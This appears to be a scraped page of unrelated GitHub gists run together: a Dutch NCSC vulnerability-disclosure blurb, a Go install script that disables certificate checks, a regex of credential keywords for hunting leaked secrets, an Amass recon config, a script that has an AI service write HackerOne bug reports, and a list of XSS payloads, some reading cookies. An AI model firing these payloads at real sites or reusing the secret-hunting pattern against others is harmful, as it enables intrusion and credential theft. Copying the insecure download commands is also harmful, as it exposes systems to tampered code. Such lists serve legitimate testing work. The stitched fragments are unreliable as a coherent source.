The National Cyber Security Centre (NCSC) contributes to jointly enhancing the resilience of the Dutch society in the digital domain and, in doing so, realizes a safe, open and stable information society by providing insight and offering a perspective for action. Therefore it is essential that the ICT systems of the NCSC are safe. The NCSC strives towards providing a high level of security for its system. However, it can occur that one of these systems has a vulnerability.
For more information about reporting the bugs go to https://english.ncsc.nl/contact/reporting-a-vulnerability-cvd
Source
https://gist.github.com/random-robbie/f985ad14fede2c04ac82dd89653f52ad
https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid
| #!/usr/bin/env bash | |
| go_version=$(curl -ks https://golang.org/VERSION?m=text) | |
| red_color="\e[31m" | |
| green_color="\e[32m" | |
| no_color="\e[0m" | |
| type -P go &> /dev/null && echo -e "Current go version is ${green_color}$(go version | awk '{print $3}')${no_color}" || echo -e "${red_color}Go is not installed on your system${no_color}" | |
| echo -e "Downloading latest go into your system - version ${green_color}${go_version}${no_color}" | |
| sudo apt purge --auto-remove golang-go 2> /dev/null &> /dev/null | |
| sudo apt clean &> /dev/null | |
| wget https://dl.google.com/go/${go_version}.linux-amd64.tar.gz -q --no-check-certificate 2> /dev/null |
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
ATTENTION, THIS GIST ISN'T FREQUENTLY UPDATED
MAIN SOURCE: https://github.com/isaqueprofeta/cybersec-path
| # Copyright © by Jeff Foley 2017-2023. All rights reserved. | |
| # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
| # SPDX-License-Identifier: Apache-2.0 | |
| # Should results only be collected passively and without DNS resolution? Not recommended. | |
| #mode = passive | |
| # Would you like to use active techniques that communicate directly with the discovered assets, | |
| # such as pulling TLS certificates from discovered IP addresses and attempting DNS zone transfers? | |
| #mode = active |
| import poe, sys | |
| client = poe.Client("<POE_API_KEY_HERE>") | |
| title=sys.argv[1] | |
| path=sys.argv[2] | |
| more="" | |
| if len(sys.argv) > 3: | |
| more="\" and here is more information: "+sys.argv[3] | |
| message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
| #<script>alert(1)</script> | |
| 1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus= | |
| "><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!-- | |
| #javascript:alert(2); | |
| "><svg onload=alert(1)> | |
| [email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E | |
| [email protected]%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E | |
| //?aspxerrorpath=<script>alert(1)</script> | |
| 嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E | |
| alert##<script>prompt(1234)</script> |
